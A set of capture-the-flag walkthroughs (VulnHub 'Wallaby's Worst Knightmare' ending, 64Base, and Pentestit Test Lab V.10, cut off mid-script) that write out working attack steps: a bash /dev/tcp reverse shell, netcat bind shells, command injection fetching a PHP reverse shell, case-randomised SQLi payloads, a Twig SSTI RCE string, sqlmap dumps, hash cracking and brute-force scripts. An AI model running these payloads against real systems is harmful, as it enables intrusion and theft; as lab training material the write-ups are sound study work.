:!bash -i >& /dev/tcp/192.168.1.14/1236 0>&1

Now I had a shell as root. Browsing into /root I found flag.txt:

###CONGRATULATIONS###

You beat part 1 of 2 in the "Wallaby's Worst Knightmare" series of vms!!!!

This was my first vulnerable machine/CTF ever!  I hope you guys enjoyed playing it as much as I enjoyed making it!

Come to IRC and contact me if you find any errors or interesting ways to root, I'd love to hear about it.

Thanks guys!
-Waldo

[VULNHUB] 64Base: 1.0.1

An unexpected Star Wars based VM from VulnHub (I really love Star Wars). It is beautiful and I got trolled too! Let’s see what I did.

FLAG 1

First of all I scanned the open ports:

nmap 192.168.1.16 -p 1-65535 -sV

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-12-20 18:43 CET
Nmap scan report for 192.168.1.16
Host is up (0.0092s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE    VERSION
80/tcp    open  http       Apache httpd 2.4.10 ((Debian))
4899/tcp  open  tcpwrapped
62964/tcp open  ssh        OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 8.70 seconds

Then I scanned the port 80 with nikto:

nikto -h 192.168.1.16

I truncated the output because the robots.txt file was full of entries:

- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.1.16
+ Target Hostname:    192.168.1.16
+ Target Port:        80
+ Start Time:         2016-12-20 18:44:08 (GMT1)
---------------------------------------------------------------------------
+ Server: Apache/2.4.10 (Debian)
+ Server leaks inodes via ETags, header found with file /, fields: 0x1fdf 0x542f6bd9b68a0 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/88888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/88888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/c3P08P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/C3p0/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/A280/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/above/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/AC1/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/across/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/activation/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Adjustments/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/after/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/against/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ago/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Pack/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Parking/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
...
+ Entry '/Y888888/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y888888888P/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Y8b/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Yard/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/Zero/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/ZZ/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 429 entries which should be manually viewed.
+ Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS 
+ OSVDB-3268: /img/: Directory indexing found.
+ OSVDB-3092: /img/: This might be interesting...
+ OSVDB-3268: /mail/: Directory indexing found.
+ OSVDB-3092: /mail/: This might be interesting...
+ OSVDB-3092: /members/: This might be interesting...
+ OSVDB-3092: /order/: This might be interesting...
+ OSVDB-3092: /staff/: This might be interesting...
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /as/: This might be interesting... potential country code (American Samoa)
+ OSVDB-3092: /by/: This might be interesting... potential country code (Belarus)
+ OSVDB-3092: /is/: This might be interesting... potential country code (Iceland)
+ OSVDB-3092: /no/: This might be interesting... potential country code (Norway)
+ OSVDB-3092: /to/: This might be interesting... potential country code (Tonga)
+ 8115 requests: 0 error(s) and 434 item(s) reported on remote host
+ End Time:           2016-12-20 18:44:21 (GMT1) (13 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

The only interesting directory seemed to be /admin, but it required HTTP basic authentication and I didn’t have any username or password. So I analyzed the source code of the index and discovered this:

5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a

It seemed to be a hex-encoded string, so I decoded it:

echo "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a" | xxd -p -r

This is the decoded string:

ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==

This is base64, so I decoded it:

echo "ZmxhZzF7TmpSaVlYTmxPbFJvTXpVelFISXpUakJVWkdGRWNqQXhSSHBWUUhKbFREQXdTekZwYm1jMENnPT19Cg==" | base64 -d

I got the first flag, and decoding its base64 content I got:

64base:Th353@r3N0TdaDr01DzU@reL00K1ing4

Cool! Now I had a username and a password.

FLAG 2

I tried the credentials on /admin without success. I spent many hours looking for the right way and in the end, reading the post on the blog, I found this:

Only respond if you are a real Imperial-Class BountyHunter

The string Imperial-Class was already familiar: it was in the robots.txt file, but with a lowercase c (maybe a typo). So I browsed to http://192.168.1.16/Imperial-Class and used the credentials I had found for the HTTP basic authentication. I got an error on the index page:

[☠] ERROR: incorrect path!.... TO THE DARK SIDE!

I looked into the source code and I found this:

don't forget the BountyHunter login

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter and a login form appeared. I used the same credentials as for the previous authentication, but nothing changed. I looked into the source code of the page and found three strings:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756
584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c32
52714d544a54626d51315a45566157464655614446525557383966516f3d0a

I joined them into a single string:

5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a

And I decoded it from hex:

echo "5a6d78685a7a4a37595568534d474e4954545a4d65546b7a5a444e6a645756584f54466b53465a70576c4d31616d49794d485a6b4d6b597757544a6e4c3252714d544a54626d51315a45566157464655614446525557383966516f3d0a" | xxd -p -r

I got this:

ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=

Now decode from base64:

echo "ZmxhZzJ7YUhSMGNITTZMeTkzZDNjdWVXOTFkSFZpWlM1amIyMHZkMkYwWTJnL2RqMTJTbmQ1ZEVaWFFUaDFRUW89fQo=" | base64 -d

And I got the second flag.
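
The two flags above (and, later in this writeup, the EXIF comment and the final flag) are the same onion of hex and base64 layers, decoded by hand one command at a time. The Python below is an added example, not code from the original post: a small peeler that keeps decoding while the result stays printable ASCII, unwraps the flagN{...} envelope, and reports each layer. The input is the first flag’s hex string quoted from the page; the layer names and the printable-ASCII stopping rule are my own choices.

```python
import base64
import binascii
import re
import string

# Hex string quoted from the writeup: the first flag as found in the /admin index source
FLAG1_HEX = "5a6d78685a7a4637546d705361566c59546d785062464a7654587056656c464953587055616b4a56576b644752574e7151586853534842575555684b6246524551586454656b5a77596d316a4d454e6e5054313943673d3d0a"

# Matches the flagN{...} envelope the CTF wraps around the next layer
FLAG_RE = re.compile(r"^flag(\d+)\{(.*)\}$", re.DOTALL)


def _printable(raw):
    """Return raw as text if it is non-empty printable ASCII, else None.
    This is the stopping rule: a layer that decodes to binary junk is not a layer."""
    try:
        text = raw.decode("ascii")
    except UnicodeDecodeError:
        return None
    if text and all(c in string.printable for c in text):
        return text
    return None


def try_hex(s):
    """Decode an even-length hex string, or return None."""
    if len(s) % 2 or not re.fullmatch(r"[0-9a-fA-F]+", s):
        return None
    return _printable(bytes.fromhex(s))


def try_base64(s):
    """Decode a base64 string (whitespace tolerated), or return None."""
    compact = re.sub(r"\s+", "", s)
    if not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", compact):
        return None
    try:
        return _printable(base64.b64decode(compact, validate=True))
    except binascii.Error:
        return None


def peel(blob, max_depth=10):
    """Strip layers until nothing decodes. Returns [(layer_kind, text), ...].
    Hex is tried before base64 because every hex string is also alphabet-valid base64."""
    layers = []
    cur = blob.strip()
    for _ in range(max_depth):
        envelope = FLAG_RE.match(cur)
        if envelope:
            kind, text = "flag" + envelope.group(1), envelope.group(2)
        else:
            kind, text = "hex", try_hex(cur)
            if text is None:
                kind, text = "base64", try_base64(cur)
        if text is None:
            break
        cur = text.strip()
        layers.append((kind, cur))
    return layers


if __name__ == "__main__":
    for kind, text in peel(FLAG1_HEX):
        print(f"{kind:>7}: {text}")
```

The same function handles the second flag, the EXIF comment and the SSH-key blob from later sections: paste the string in and read the last layer. It stops at the SSH key because a PEM body is printable but is neither valid hex nor a flag envelope, which is exactly where manual inspection should take over.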

FLAG 3

I got the third flag with a lot of luck. At this point I had no idea how to go further, so I tried curl on login.php:

curl -u 64base:Th353@r3N0TdaDr01DzU@reL00K1ing4 "http://192.168.1.16/Imperial-Class/BountyHunter/login.php"

And I got the third flag as output. I decoded the content from base64 and I got:

53cr3t5h377/Imperial-Class/BountyHunter/login.php?f=exec&c=id

It seemed that I had found a command injection vulnerability.

FLAG 4

So I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=exec&c=id but I didn’t get the expected output. Then I remembered the image in the blog post which says “IMPORTANT!!! USE SYSTEM INSTEAD OF EXEC TO RUN THE SECRET 5H377”. So I changed the URL to:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=id

I got the expected output, and flag4 too. Decoding its content I found other credentials:

64base:64base5h377

FLAG 5

Now I needed to get a shell, so I tried:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=nc -lvp 1234 -e /bin/bash

But I got trolled:

░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░▄▄███░░░░░
░░▄▄░░░░░░░░░░░░░░░░░░░░░░░░░███████░░░░
░░███▄░░░░░░░░░░░░░░░░░░░░░▄█████▀░█░░░░
░░▀█████▄▄▄▄▀▀▀▀▀▀▀▀░▄▄▄▄▄███▀▀░▀███░░░░
░░░░███▀▀░░░░░░░░░░░░░░▀▀▀███░░░░██▀░░░░
░░░░██░░░░░░▄░░░░░░░░░░░░░░░▀▀▄▄███░░░░░
░░░░▄█▄▄████▀█░█▄██▄▄░░░░░░░░░████▀░░░░░
░░░▄████████░░░██████▄▄▄▄░░░░░████░░░░░░
░░░███░█░▀██░░░▀███░█░░███▄▄░░░░▀█░░░░░░
░░░████▄███▄▄░░░███▄▄▄█████▀░░░░░██░░░░░
░░▄████▀▀░▀██▀░░░▀█████████░░░░░░██░░░░░
░░▀███░░░▄▄▀▀▀▄▄░░░░▀██████░░░░░░░█░░░░░
░░░███░░█░░░░░░░▀░░░░▀███▀░░░░░░░░█░░░░░
░░░████▄▀░░░░░░░░▀░░░████▄░░░░░░░░░█░░░░
░░░██████▄░░░░░░░░░▀▀████▀░░░░░░░░░█░░░░
░░▄█████████▀▀▀▀░░░░░░░░░░░░░░░░░░░▀█░░░
░░███████████▄▄▄▄░░░░░░░░░░░░░░░░░░░█▄░░
░░████████▀▀▀▀▀▀░░░░░░░░░░░░░░░░░░░░░█▄░
░░████████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░█░
░▄███████▄▄░░░░░░░░░░░░░░░░░░░░░░░░░░░░█
░▀▀▀▀▀▀▀▀▀█▀▀▀░░░░░░░░░░░░░░░░░░░░░░░░░█
Is this the net cat you are looking for?

LOL! So I tried to download a PHP reverse shell (pentestmonkey) from my local Apache server:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget "http://192.168.1.4/shell.php"

I listed the files, but the command didn’t seem to work. So I tried to download it recursively:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=wget -r "http://192.168.1.4"

This command didn’t work either. So I tried to dump the variable with a PHP function:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r "http://192.168.1.4"

And I got:

';cat.real /etc/issue;date;uname -a;/sbin/ifconfig eth0|/usr/share/grep.real inet;echo sudo -u 64base wget -r http192.168.1.4"

OK, I changed the URL a bit to avoid the escaped characters:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=var_dump&c=wget -r 192.168.1.4

The output was correct, so I tried system again, but listing the files showed it hadn’t downloaded anything. So I needed to escape from the 64base binary, which seemed to filter some commands. I tried with | and it worked:

http://192.168.1.16/Imperial-Class/BountyHunter/login.php?f=system&c=escape|wget -r 192.168.1.4

Now I had shell.php inside the 192.168.1.4 folder. Then I started listening locally:

nc -lvp 1234

Then I browsed to http://192.168.1.16/Imperial-Class/BountyHunter/192.168.1.4/shell.php and I got a shell! Then I searched for the flag:

find -name "*flag*" 2>/dev/null

And I got it:

/var/www/html/admin/flag5{TG9vayBJbnNpZGUhIDpECg==}

FLAG 6

Flag5 was a file, so I changed to /var/www/html/admin and typed:

python -m SimpleHTTPServer 8080

Then I downloaded the file from http://192.168.1.16:8080 and I checked with the file command that it was a JPG image. So I extracted some information with exiftool, in particular the comment:

4c5330744c5331435255644a546942535530456755464a4a566b46555253424c52566b744c5330744c517051636d39

I decoded it from hex and then from base64 and I got an SSH private key. Then I tried to connect via SSH, but the key had a passphrase. So I used phrasendrescher to crack it:

pd pkey -d rockyou.txt -K key

The cracked passphrase was usetheforce. So I retried the SSH connection:

ssh root@192.168.1.16 -p 62964 -i key

It worked! And I got the last flag. Decoding it alternately from hex and base64 a few times I got the secret plans of Black Star. And I finished the VM too…

[VULNHUB] 64Base: 1.0.1

[PENTESTIT] Test Lab V.10

INTRODUCTION

This new Pentestit lab was really hard but really interesting for me. It simulates a real company and a real penetration test. I spent many hours learning some new things, and I want to thank the people who gave me hints to reach some of the tokens.

NETWORK

Network diagram: https://lab.pentestit.ru/images/labs/TL10_map.png
First of all, after connecting to the VPN, I launched nmap to discover the available ports:

nmap 192.168.101.9 -p 1-65535

This is the output:

Starting Nmap 7.31 ( https://nmap.org ) at 2016-11-30 15:03 CET
Nmap scan report for gds.lab (192.168.101.9)
Host is up (0.077s latency).
Not shown: 65530 filtered ports
PORT     STATE SERVICE
22/tcp   open  ssh
25/tcp   open  smtp
80/tcp   open  http
443/tcp  open  https
8100/tcp open  xprint-server

Nmap done: 1 IP address (1 host up) scanned in 386.76 seconds

Browsing to http://192.168.101.9 I got a redirect to http://store.gds.lab, but I couldn’t resolve the hostname. So I added it to /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab

Now http://store.gds.lab worked. After that I checked http://gds.lab too and discovered an ownCloud page which told me to add http://cloud.gds.lab as a trusted host, so I added another line to /etc/hosts:

192.168.101.9 gds.lab
192.168.101.9 store.gds.lab
192.168.101.9 cloud.gds.lab

MAIL

I spent a lot of time on the store without discovering anything. I decided to skip to http://gds.lab:443, and analyzing the source code I discovered this comment:

Alfred Modlin said use this template

I also found two e-mail addresses on the Contact page, so I had three addresses to test:

s.locklear@gds.lab
j.wise@gds.lab
a.modlin@gds.lab

I browsed to http://gds.lab:8100 and I intercepted the POST request with BurpSuite. I sent the request to Intruder with the following payload:

POST / HTTP/1.1
Host: gds.lab:8100
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://gds.lab:8100/
Connection: close
Content-Type: multipart/form-data; boundary=---------------------------12655615391746434301144945042
Content-Length: 775

-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="FormCharset"

utf-8
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Username"

a.modlin
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Password"

§password§
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="SessionSkin"

*
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="login"

Enter
-----------------------------12655615391746434301144945042
Content-Disposition: form-data; name="Skin"

Viewpoint
-----------------------------12655615391746434301144945042--

I used john.txt as the wordlist, and after some minutes I discovered the password: justdoit. I logged into the account and I discovered the token! There was also an e-mail from j.wise:

Hi there!
Here is the app we talked about.
It's kinda like Google Authenticator - but the second factor is an SSH port currently opened.
So we have only one port opened for ssh at 172.16.0.1 at a time. This app will show it to you.
Please, check it on your phone for any bugs/suggestions and send them to me.

So the app can reveal the test-ssh port to us.

SITE

Now I focused on http://gds.lab:443. I discovered an SQLi on http://gds.lab:443/post.php?id=1. It seemed that a WAF was protecting the site; after some tries I found that random case could bypass it. First of all I retrieved the number of columns: after some tries I discovered that there are 2:

http://gds.lab:443/post.php?id=') UNioN All SeLect CONcaT('TITLE'), CONcaT('POST')#

Remember to URL-encode the string from ‘) to the end.

Then I discovered the table names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(TabLe_nAmE) FroM InfOrMatIoN_scHemA.TabLes WheRe TabLe_sCheMa=database()#

I got this:

posts,users 

Cool! The users table is my target. Let’s discover the column names:

http://gds.lab:443/post.php?id=') UNioN SeLect 1, GrouP_CONcaT(ColUmN_nAmE) FroM InfOrMatIoN_scHemA.ColuMns WheRe TabLe_NaME='users'#

This is the output:

id,username,password 

And now the last query:

http://gds.lab:443/post.php?id=') UNioN All SeLect username, PasSwoRd FroM site.users#

Perfect! I found a username, e.lindsey, and a hash:

$1$w9aURG9k$Wf1VIpv9VET3v3VWZ4YD8. 

Now I needed to crack it. First of all I identified the hash with hash-identifier (it is MD5(Unix)), then I cracked it with hashcat:

optirun hashcat -a 0 -m 500 hash.txt rockyou.txt

And I got this:

lindsey123

Now I could log into the site from /admin with the e.lindsey:lindsey123 credentials, and in the end I got the token.
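
The random-case trick works because the WAF matched keywords literally and case-sensitively against the raw parameter. The Python below is an added illustration, not part of the original writeup or of the lab: it runs the three UNION payloads quoted above through a naive case-sensitive rule set and through one that canonicalises the value first (URL-decode, strip comments, collapse whitespace, lower-case), and then shows the real fix, binding the id as a query parameter so the same payload is compared as a literal string and returns nothing. The table layout, sample rows and rule patterns are constructed for the demo.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# The three UNION payloads quoted from the writeup (random case slipped past the WAF)
PAYLOADS = [
    "') UNioN All SeLect CONcaT('TITLE'), CONcaT('POST')#",
    "') UNioN SeLect 1, GrouP_CONcaT(TabLe_nAmE) FroM InfOrMatIoN_scHemA.TabLes WheRe TabLe_sCheMa=database()#",
    "') UNioN All SeLect username, PasSwoRd FroM site.users#",
]

# Constructed: a literal, case-sensitive rule set, the kind of filter random case defeats
NAIVE_RULES = [r"UNION SELECT", r"UNION ALL SELECT", r"information_schema"]


def naive_waf_blocks(value):
    return any(re.search(rule, value) for rule in NAIVE_RULES)


def normalize(value):
    """Canonicalise before matching: URL-decode twice, drop /* */ comments,
    collapse whitespace, lower-case. Rules then see 'union select' whatever
    casing or encoding the request used."""
    s = unquote_plus(unquote_plus(value))
    s = re.sub(r"/\*.*?\*/", " ", s, flags=re.DOTALL)
    s = re.sub(r"\s+", " ", s)
    return s.lower()


# Constructed rules, applied to the canonical form only
HARDENED_RULES = [
    r"\bunion\b(?: all)? select\b",
    r"\binformation_schema\b",
    r"\bgroup_concat\s*\(",
]


def hardened_waf_blocks(value):
    canon = normalize(value)
    return any(re.search(rule, canon) for rule in HARDENED_RULES)


def make_demo_db():
    """Constructed in-memory stand-in for the site database (two tables, one row each)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE posts (id INTEGER PRIMARY KEY, title TEXT, post TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.execute("INSERT INTO posts VALUES (1, 'Welcome', 'first post')")
    conn.execute("INSERT INTO users VALUES (1, 'e.lindsey', 'hash-placeholder')")
    return conn


def fetch_post(conn, post_id):
    """The parameterised form of post.php?id=...: the value is bound, never spliced
    into the SQL text, so a UNION payload is compared as a string and matches no row.
    This is the fix; the WAF is only a mitigating layer in front of it."""
    return conn.execute("SELECT title, post FROM posts WHERE id = ?", (post_id,)).fetchone()


if __name__ == "__main__":
    for p in PAYLOADS:
        print(f"naive={naive_waf_blocks(p)!s:5} hardened={hardened_waf_blocks(p)!s:5} {p[:45]}...")
    conn = make_demo_db()
    print(fetch_post(conn, "1"), fetch_post(conn, PAYLOADS[2]))
```

Normalisation closes the casing and encoding gaps, but pattern matching stays a blocklist: the lesson of this section is that the query itself must bind its parameters, because a filter that has to anticipate every spelling of UNION will eventually miss one.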

SSH

Now I switched to SSH. With the credentials I had found I connected to it:

ssh e.lindsey@192.168.101.9

Searching around I found the /data folder with a /users subdirectory, but once inside it I couldn’t list files because I didn’t have read permission. So I tried to bruteforce directory names with a bash script:

#!/bin/bash
# Usage: brutedir.sh <base path> <wordlist>
path="$1"

# Read the wordlist one name per line (the || handles a last line without a newline)
while IFS='' read -r directory || [[ -n "$directory" ]]; do
    if [ -d "$path/$directory" ]; then
      printf '[+] Directory %s exists!\n' "$path/$directory"
    fi
done < "$2"

I copied it into /tmp and I typed:

chmod +x brutedir.sh
./brutedir.sh /data/users users.txt

Then I bruteforced the directories of each user found, in particular:

./brutedir.sh /data/users/rross raft-large-directories-lowercase.txt

In the end I found /data/users/rross/docs, and I could list the files inside that directory. Token found! I also found the SSH key of a.modlin in /data/users/a.modlin.

TEST-SSH

To reach test-ssh I needed to log into SSH and discover the hidden port. I decompiled the APK and discovered that the port changes randomly. So from the SSH box I typed:

ssh a.modlin@172.16.0.1 -p $(nmap -sT 172.16.0.1 -p 1-65535 | grep open | cut -d "/" -f 1) -i a.modlin_key

Now I am logged into test-ssh. I listed the files and I found the token.

BLOG

For the blog I created an SSH tunnel:

ssh -L 8080:192.168.0.4:80 e.lindsey@192.168.101.9

Then I connected to http://localhost:8080 and a Joomla blog appeared. I searched a lot and finally I found this exploit, which redirected me to https://github.com/XiphosResearch/exploits/tree/master/Joomraa. So I downloaded the Python script and executed it:

python joomraa.py -u reversebrain -p password -e mail@host.com http://localhost:8080

Then I logged into the http://localhost:8080/administrator page with the credentials I had created. I navigated to the articles and found an unpublished one: the token was its alias!

CAPTCHA

Again I opened an SSH tunnel:

ssh -L 8080:192.168.0.7:80 e.lindsey@192.168.101.9

Now I navigated to http://localhost:8080 and a blank image with an input form appeared. Checking /robots.txt I found this:

User-agent: *
Disallow: *.bak

I also found /readme.txt:

Notice: don't forget - destroy all cached captcha every %time% via system.

When I tried to open the image location I got “500 Internal Server Error”, so I tried removing .png and adding .bak, but I still received the same error. So I opened a private browser tab to avoid cookie problems and finally downloaded captcha.bak. I opened it with a text editor:

file_put_contents($session_path.'/captcha', serialize($_SESSION));
file_put_contents($session_path.'/($_SESSION).php', '<?php system($_GET[session]); ?>');

It contains PHP code; the second line tells me that an RCE vulnerability exists, and the backdoor is the “($_SESSION).php” file. So I closed and reopened the private tab, copied the blank image location, deleted captcha.png and added ($_SESSION).php. Then I tried http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=ls and it worked! So I created a bind shell:

http://localhost:8080/sources/e092a74ec21bca8810d8b24e4995e5bda8ba37a83576663ac6d44f1fdc108af8eafc3582b3eeb8332ba7c9bccbb7d0f5ed1ca39bdf5924b4fe1552fb57f4ffc0ac348bb77cb613a82358e31e886fc48e77c50e795963d5f2e74192428d46f5d600fd4f/($_SESSION).php?session=nc -lvp 1234 -e /bin/bash

Then I connected to the shell from the SSH machine:

nc -v 192.168.0.7 1234

Going back two directories I found the token.token file.

HALL OF FAME

The next target is hall-of-fame. I created another SSH tunnel:

ssh -L 8080:192.168.0.8:80 e.lindsey@192.168.101.9

Bruteforcing directories and files I found /backup/passwords.txt:

creator:liverpool
developer:s2shj1BvYq83k6M

Logging in with the developer credentials I got a redirect to a page which displayed this:

$_SESSION contents:
Array ( [username] => editor [login] => editor [loggedIn] => 1 )
/dev/ password: 0bf190ffdc397fd51334d908845fbb1

So I browsed to /dev and used dev:0bf190ffdc397fd51334d908845fbb1 as credentials. Then, after many hours, I discovered an SSTI vulnerability in the hname parameter. I found a great article which explains in detail what it is. In the end I found that the template engine in use was Twig. To get a shell I typed this:

http://localhost:8080/dev/index.php?hname={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("nc -lvp 1234 -e /bin/bash")}}

From the SSH box I ran:

nc -v 192.168.0.8 1234

Then I looked for the token:

find / -name "*token*" 2>/dev/null

In the end I found its location:

/usr/share/nginx/token_70f01ee6914535591d7c4c96b7004709.txt

NEWS

Yet another SSH tunnel:

ssh -L 8080:192.168.0.5:80 e.lindsey@192.168.101.9

Playing around on the site I discovered a password reset tool and two e-mail addresses:

user@gds.lab
admin@gds.lab

First of all I reset the user password, then I logged in with the user@gds.lab:user credentials, and after that I clicked on User Info:

Token  Your princess is in another castle!

It seems that we need to log in as admin and click on User Info. Bruteforcing directories I found /old, which has login, logout and reset password links. The last one didn’t work. So first of all I reset the admin password from the main page, then I logged into /old with the admin:admin credentials, and in the end I browsed to http://localhost:8080/user_info.php and found the token.

STORE

For the store I browsed to http://store.gds.lab and analyzed it for hours without success; then I created an SSH tunnel to dev-store:

ssh -L 8080:172.16.0.5:80 e.lindsey@192.168.101.9

It is the OpenCart CMS, so I found a public exploit and checked the SQLi:

http://localhost:8080/index.php?route=product/product&product_id=53%27

This is the output:

Fatal error: Uncaught exception 'Exception' with message 'Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1
Error No: 1064
select * from oc_download_stats where d_id=2 and p_id=53'' in /var/www/system/library/db/mysqli.php:40 Stack trace: #0 /var/www/system/library/db.php(16): DB\MySQLi->query('select * from o...', Array) #1 /var/www/catalog/controller/product/download_stat.php(39): DB->query('select * from o...') #2 /var/www/system/storage/modification/catalog/controller/product/product.php(499): DownloadStatRecord->load('2', '53'') #3 [internal function]: ControllerProductProduct->index() #4 /var/www/system/storage/modification/system/engine/action.php(51): call_user_func_array(Array, Array) #5 /var/www/catalog/controller/startup/router.php(25): Action->execute(Object(Registry)) #6 [internal function]: ControllerStartupRouter->index() #7 /var/www/system/storage/modification/system/engine/action.php(51): cal in /var/www/system/library/db/mysqli.php on line 40

Fire up sqlmap:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id

Then I displayed all databases:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id --dbs

Select the target db and display the tables:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab --tables

There is a token table, dump it:

sqlmap -u "http://localhost:8080/index.php?route=product/product&product_id=53" -p product_id -D testlab -T token --dump

Token found!

WEB-CONTROL

First of all I connected to the SSH box and scanned for open ports:

nmap 192.168.0.6

This is the output:

Starting Nmap 6.00 ( http://nmap.org ) at 2016-12-09 12:26 MSK
Nmap scan report for 192.168.0.6
Host is up (0.0015s latency).
Not shown: 997 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
1503/tcp open  imtc-mcs

Nmap done: 1 IP address (1 host up) scanned in 0.19 seconds

So I tried to connect to port 1503:

nc 192.168.0.6 1503

A login prompt appeared. I wrote a Python script to bruteforce it:

import socket
import sys
import os

# Check parameters
if len(sys.argv) != 3:
    sys.stderr.write("[INFO] Usage: " + sys.argv[0] + " userlist passwordlist\n")
    sys.exit(1)

# Logo
print("[INFO] Web-Control bruter\n")

# Check list files
if not os.path.exists(sys.argv[1]):
    sys.stderr.write("[ERROR] userlist was not found!\n")
    sys.exit(1)

if not os.path.exists(sys.argv[2]):
    sys.stderr.write("[ERROR] passwordlist was not found!\n")
    sys.exit(1)
else:
    print("[INFO] Loading your lists...\n")


def read_until(sock, marker):
    """Read one byte at a time until the prompt marker (or EOF) is seen."""
    data = b""
    while not data.endswith(marker):
        tmp = sock.recv(1)
        if tmp == b"":
            break
        data += tmp
    return data


# Bruter
print("[INFO] Start bruting...\n")

with open(sys.argv[1]) as user_file:
    for user in user_file:
        with open(sys.argv[2]) as password_file:
            for password in password_file:
                # Connection: one fresh connection per attempt
                try:
                    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                    s.connect(('192.168.0.6', 1503))
                except socket.error:
                    print("[ERROR] Can't connect to host!\n")
